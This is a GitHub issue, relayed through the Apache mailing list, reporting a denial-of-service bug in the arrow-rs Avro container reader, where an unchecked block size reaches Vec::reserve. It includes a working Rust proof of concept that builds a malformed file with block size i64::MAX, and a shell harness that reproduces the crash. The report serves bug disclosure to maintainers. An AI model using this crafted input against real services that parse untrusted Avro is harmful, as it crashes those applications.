hibrian827 opened a new issue, #10234:
URL: https://github.com/apache/arrow-rs/issues/10234
### Describe the bug
## Summary
The Avro Object Container File reader in arrow-rs accepts an
attacker-controlled block size and reserves that many bytes before validating
that the block payload is present or bounded. A crafted OCF file with a valid
header and a first block size of `i64::MAX` makes
`arrow_avro::reader::ReaderBuilder` abort the process with an attempted
allocation of 9223372036854775807 bytes, turning malformed input into a denial
of service for applications that parse untrusted Avro uploads or imports.
## Affected
- Pinned ref: be664614ab684ec34809361f7e868cc8c3919552
## Root cause
The public OCF entry point `ReaderBuilder::build` accepts any `BufRead`,
reads the container header, and constructs a `Reader` with a default block
decoder at `arrow-avro/src/reader/mod.rs:1289`. When the caller iterates the
reader, `Reader::read` obtains bytes from that same input with `fill_buf` at
`arrow-avro/src/reader/mod.rs:1363` and passes the buffered block bytes
directly into `BlockDecoder::decode` at `arrow-avro/src/reader/mod.rs:1369`.
Inside the block decoder, the file-controlled block count is decoded at
`arrow-avro/src/reader/block.rs:83`, then the file-controlled block size is
decoded and converted to `usize` at `arrow-avro/src/reader/block.rs:94`. The
sink is `arrow-avro/src/reader/block.rs:99`, where that decoded size is passed
to `Vec::reserve` before the decoder checks whether the advertised block data
exists, whether the sync marker can be reached, or whether the block size is
acceptable for the implementation.
### To Reproduce
<details>
<summary>PoC</summary>
inputs/src/main.rs
```rs
use std::io::Cursor;
use arrow_avro::reader::ReaderBuilder;
fn encode_long(value: i64, out: &mut Vec<u8>) {
let mut n = ((value << 1) ^ (value >> 63)) as u64;
while n >= 0x80 {
out.push((n as u8) | 0x80);
n >>= 7;
}
out.push(n as u8);
}
fn encode_bytes(bytes: &[u8], out: &mut Vec<u8>) {
encode_long(bytes.len() as i64, out);
out.extend_from_slice(bytes);
}
fn ocf_with_block_size(block_size: i64) -> Vec<u8> {
let schema =
br#"{"type":"record","name":"R","fields":[{"name":"x","type":"null"}]}"#;
let sync = [0x41u8; 16];
let mut out = Vec::new();
out.extend_from_slice(b"Obj\x01");
encode_long(1, &mut out);
encode_bytes(b"avro.schema", &mut out);
encode_bytes(schema, &mut out);
encode_long(0, &mut out);
out.extend_from_slice(&sync);
encode_long(1, &mut out);
encode_long(block_size, &mut out);
if block_size == 0 {
out.extend_from_slice(&sync);
}
out
}
fn main() {
let small = std::env::args().any(|arg| arg == "small");
let bytes = if small {
ocf_with_block_size(0)
} else {
ocf_with_block_size(i64::MAX)
};
let mut reader = ReaderBuilder::new()
.build(Cursor::new(bytes))
.expect("public ReaderBuilder accepted OCF header");
match reader.next() {
Some(Ok(batch)) => println!("decoded {} rows", batch.num_rows()),
Some(Err(err)) => {
eprintln!("reader error: {err}");
std::process::exit(1);
}
None => println!("no rows"),
}
}
```
run.sh
```sh
#!/usr/bin/env bash
# Self-contained PoC for INT-avro-arrow-rs-ocf-block-size-reserve-panic.
#
# Run from this directory:
# ./run.sh # setup + build + trigger end-to-end (recommended)
# ./run.sh setup # clone + checkout pinned ref only
# ./run.sh build # setup, then compile/link against the cloned
source
# ./run.sh trigger # setup + build, then run the bug-triggering input
#
# This script is intentionally quiet — setup, build, and the trigger's
# build-phase output go to a per-phase log file; only the reproduction
# signal (the oracle fingerprint and/or the documented runtime
# signature — panic / sanitizer report / wrong-output line) reaches the
# terminal. On failure the relevant log is dumped to stderr so a reader
# can diagnose without trawling for it.
#
# The upstream repo is cloned into ./source at the pinned SHA on the
# first run and REUSED on subsequent runs (the setup phase is a no-op
# when ./source already has HEAD at the pinned SHA). The clone is NOT
# deleted automatically — remove it manually with `rm -rf source/` if
# you want to reclaim disk space or force a re-clone next run.
#
# Expected runtime signature when the bug triggers:
# memory allocation of 9223372036854775807 bytes failed
set -euo pipefail
script_dir="$(cd "$(dirname "${BASH_SOURCE[0]}")" && pwd)"
source_dir="$script_dir/source"
UPSTREAM_REPO_URL="https://github.com/apache/arrow-rs"
UPSTREAM_PINNED_SHA="be664614ab684ec34809361f7e868cc8c3919552"
# Run a function silently, dumping its log to stderr only on failure.
# Keeps the maintainer-facing terminal clean: success → no noise;
# failure → enough context to know what broke and where.
_silent() {
local label="$1"; shift
local log="$script_dir/.${label}.log"
if ! "$@" > "$log" 2>&1; then
echo "[run.sh] $label failed; log follows:" >&2
cat "$log" >&2
return 1
fi
}
setup() {
# Idempotent. If ``$source_dir`` already exists with HEAD at the
# pinned SHA, reuse it — the clone survives across runs by design
# (no cleanup trap; ``rm -rf source/`` manually to force a re-clone).
# Otherwise wipe whatever's there and clone fresh: shallow fetch
# for the exact SHA first (cheap when the server allows sha-by-
# fetch); full clone + checkout fallback for older git or restrictive
# upload-pack configs. After the checkout, HEAD is verified against
# the pinned SHA so a rewritten history / wrong-SHA / partial-fetch
# failure surfaces here instead of masquerading as a build failure
# later.
if [[ -d "$source_dir/.git" ]] \
&& [[ "$(git -C "$source_dir" rev-parse HEAD 2>/dev/null)" ==
"$UPSTREAM_PINNED_SHA" ]]; then
echo "[run.sh] reusing existing $source_dir at $UPSTREAM_PINNED_SHA"
return 0
fi
_setup_inner() {
rm -rf "$source_dir"
mkdir -p "$source_dir"
cd "$source_dir"
git init -q
git remote add origin "$UPSTREAM_REPO_URL"
if git fetch --depth 1 origin "$UPSTREAM_PINNED_SHA" -q 2>/dev/null; then
git checkout -q FETCH_HEAD
else
cd "$script_dir"
rm -rf "$source_dir"
git clone -q "$UPSTREAM_REPO_URL" "$source_dir"
git -C "$source_dir" checkout -q "$UPSTREAM_PINNED_SHA"
fi
local head
head="$(git -C "$source_dir" rev-parse HEAD)"
if [[ "$head" != "$UPSTREAM_PINNED_SHA" ]]; then
echo "setup: HEAD=$head but expected $UPSTREAM_PINNED_SHA" >&2
exit 1
fi
}
_silent setup _setup_inner
# One-line confirmation reaches the terminal — mirrors the
# 'Pinned ref:' line in the report README so the maintainer can see
# exactly which commit they're exercising before the proof emits.
echo "[run.sh] reproducing against $UPSTREAM_REPO_URL @
$UPSTREAM_PINNED_SHA"
}
build() {
export script_dir source_dir
_silent build bash -c '
set -euo pipefail
cargo_cmd=(cargo +stable)
if ! "${cargo_cmd[@]}" --version >/dev/null 2>&1; then
cargo_cmd=(cargo)
fi
if ! "${cargo_cmd[@]}" --version >/dev/null 2>&1; then
echo "cargo is required to build this PoC" >&2
exit 1
fi
build_dir="$script_dir/build-scratch"
mkdir -p "$build_dir/src"
sed "s|@ARROW_RS@|$source_dir|g" "$script_dir/inputs/Cargo.toml" >
"$build_dir/Cargo.toml"
cp "$script_dir/inputs/src/main.rs" "$build_dir/src/main.rs"
CARGO_TARGET_DIR="$build_dir/target" RUSTUP_TOOLCHAIN=1.91
"${cargo_cmd[@]}" build --quiet --manifest-path "$build_dir/Cargo.toml"
'
}
trigger() {
local
bin="$script_dir/build-scratch/target/debug/arrow-rs-avro-block-size-poc"
local log="$script_dir/.run.log"
if [[ ! -x "$bin" ]]; then
echo "trigger: missing built harness at $bin" >&2
exit 1
fi
bash -c '"$1" > "$2" 2>&1; exit 0' _ "$bin" "$log" 2>/dev/null
if grep -F "memory allocation of 9223372036854775807 bytes failed" "$log";
then
return 0
fi
echo "trigger: expected allocator-abort fingerprint not found; log
follows:" >&2
cat "$log" >&2
exit 1
}
cmd="${1:-all}"
case "$cmd" in
setup) setup ;;
build) setup; build ;;
trigger|all|"") setup; build; trigger ;;
*)
echo "usage: $0 {setup|build|trigger|all}" >&2
exit 2
;;
esac
```
</details>
```bash
bash ./poc/run.sh
```
### Expected behavior
```text
memory allocation of 9223372036854775807 bytes failed
```
The allocator message is emitted when the harness advances the public OCF
reader into the first block and the decoded block-size field reaches
`Vec::reserve`. A non-zero exit without this exact allocation fingerprint would
indicate a build or setup failure, not this reserve-before-bounds-check path.
### Additional context
_No response_
--
This is an automated message from the Apache Git Service.
To respond to the message, please log on to GitHub and use the
URL above to go to the specific comment.
To unsubscribe, e-mail: [email protected]
For queries about this service, please contact Infrastructure at:
[email protected]